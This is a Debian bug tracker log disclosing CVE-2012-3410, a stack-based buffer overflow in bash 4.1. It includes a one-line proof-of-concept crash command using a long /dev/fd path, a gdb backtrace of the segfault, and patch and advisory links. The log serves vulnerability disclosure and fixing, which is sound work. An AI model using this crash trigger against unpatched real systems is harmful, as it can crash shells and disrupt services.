Debian Bug report logs -
#681278
bash: CVE-2012-3410: Stack-based buffer overflow
Reported by: Henri Salo <henri@nerv.fi>
Date: Wed, 11 Jul 2012 21:30:17 UTC
Severity: important
Tags: confirmed, fixed-upstream, patch, security
Found in version bash/4.1-3
Fixed in version bash/4.2+dfsg-0.1
Done: Henri Salo <henri@nerv.fi>
Bug is archived. No further changes may be made.
Toggle useless messages
Report forwarded
to debian-bugs-dist@lists.debian.org, Matthias Klose <doko@debian.org>:
Bug#681278; Package bash.
(Wed, 11 Jul 2012 21:30:21 GMT) (full text, mbox, link).
Acknowledgement sent
to Henri Salo <henri@nerv.fi>:
New Bug report received and forwarded. Copy sent to Matthias Klose <doko@debian.org>.
(Wed, 11 Jul 2012 21:30:21 GMT) (full text, mbox, link).
Message #5 received at submit@bugs.debian.org (full text, mbox, reply):
Package: bash
Version: 4.1-3
Severity: important
Tags: security, fixed-upstream, patch, confirmed
Patch: ftp://ftp.gnu.org/pub/gnu/bash/bash-4.2-patches/bash42-033
PoC: test -e /dev/fd/111111111111111111111111111111111
Advisory: http://www.openwall.com/lists/oss-security/2012/07/11/11
fgeek@kludge:~$ cat foo.sh
#!/bin/bash -x
test -e /dev/fd/111111111111111111111111111111111
fgeek@kludge:~$ gdb bash
GNU gdb (GDB) 7.0.1-debian
Copyright (C) 2009 Free Software Foundation, Inc.
License GPLv3+: GNU GPL version 3 or later <http://gnu.org/licenses/gpl.html>
This is free software: you are free to change and redistribute it.
There is NO WARRANTY, to the extent permitted by law. Type "show copying"
and "show warranty" for details.
This GDB was configured as "x86_64-linux-gnu".
For bug reporting instructions, please see:
<http://www.gnu.org/software/gdb/bugs/>...
Reading symbols from /bin/bash...(no debugging symbols found)...done.
(gdb) run foo.sh
Starting program: /bin/bash foo.sh
Program received signal SIGSEGV, Segmentation fault.
0x0000000000450033 in ?? ()
(gdb) bt
#0 0x0000000000450033 in ?? ()
#1 0x000000000046c8b9 in sh_xmalloc ()
#2 0x00000000004885fd in strvec_from_word_list ()
#3 0x00000000006f3448 in ?? ()
#4 0x0000000000000134 in ?? ()
#5 0x000000000047a22c in test_builtin ()
#6 0x0000000000432500 in ?? ()
#7 0x0000000000436c84 in ?? ()
#8 0x0000000000433b64 in execute_command_internal ()
#9 0x00000000004347ce in execute_command ()
#10 0x00000000004216f2 in reader_loop ()
#11 0x0000000000420e00 in main ()
(gdb) quit
fgeek@kludge:~$ bash --version
GNU bash, version 4.1.5(1)-release (x86_64-pc-linux-gnu)
-- System Information:
Debian Release: 6.0.5
APT prefers stable-updates
APT policy: (500, 'stable-updates'), (500, 'stable')
Architecture: amd64 (x86_64)
Kernel: Linux 3.4.1 (SMP w/8 CPU cores)
Locale: LANG=en_US.UTF-8, LC_CTYPE=en_US.UTF-8 (charmap=UTF-8) (ignored: LC_ALL set to en_US.UTF-8)
Shell: /bin/sh linked to /bin/dash
Versions of packages bash depends on:
ii base-files 6.0squeeze5 Debian base system miscellaneous f
ii dash 0.5.5.1-7.4 POSIX-compliant shell
ii debianutils 3.4 Miscellaneous utilities specific t
ii libc6 2.11.3-3 Embedded GNU C Library: Shared lib
ii libncurses5 5.7+20100313-5 shared libraries for terminal hand
Versions of packages bash recommends:
pn bash-completion <none> (no description available)
Versions of packages bash suggests:
pn bash-doc <none> (no description available)
-- no debconf information
Changed Bug title to 'Buffer overflow in bash' from 'Overflow in bash'
Request was from Henri Salo <henri@nerv.fi>
to control@bugs.debian.org.
(Wed, 11 Jul 2012 22:18:04 GMT) (full text, mbox, link).
Marked as fixed in versions bash/4.2+dfsg-0.1.
Request was from Henri Salo <henri@nerv.fi>
to control@bugs.debian.org.
(Sun, 19 May 2013 11:21:12 GMT) (full text, mbox, link).
Reply sent
to Henri Salo <henri@nerv.fi>:
You have taken responsibility.
(Sun, 19 May 2013 11:24:05 GMT) (full text, mbox, link).
Notification sent
to Henri Salo <henri@nerv.fi>:
Bug acknowledged by developer.
(Sun, 19 May 2013 11:24:05 GMT) (full text, mbox, link).
Message #14 received at 681278-done@bugs.debian.org (full text, mbox, reply):
[Message part 1 (text/plain, inline)]
Could not reproduce in wheezy.
[signature.asc (application/pgp-signature, inline)]
Changed Bug title to 'bash: CVE-2012-3410: Stack-based buffer overflow' from 'Buffer overflow in bash'
Request was from Henri Salo <henri@nerv.fi>
to control@bugs.debian.org.
(Sun, 19 May 2013 11:33:10 GMT) (full text, mbox, link).
Bug archived.
Request was from Debbugs Internal Request <owner@bugs.debian.org>
to internal_control@bugs.debian.org.
(Mon, 17 Jun 2013 07:40:41 GMT) (full text, mbox, link).
Send a report that this bug log contains spam.
Debian bug tracking system administrator <owner@bugs.debian.org>.
Last modified:
Wed Jun 19 16:31:05 2019;
Machine Name:
buxtehude
Debian Bug tracking system
Debbugs is free software and licensed under the terms of the GNU
Public License version 2. The current version can be obtained
from https://bugs.debian.org/debbugs-source/.
Copyright © 1999 Darren O. Benham,
1997,2003 nCipher Corporation Ltd,
1994-97 Ian Jackson,
2005-2017 Don Armstrong, and many other contributors.
Vulmon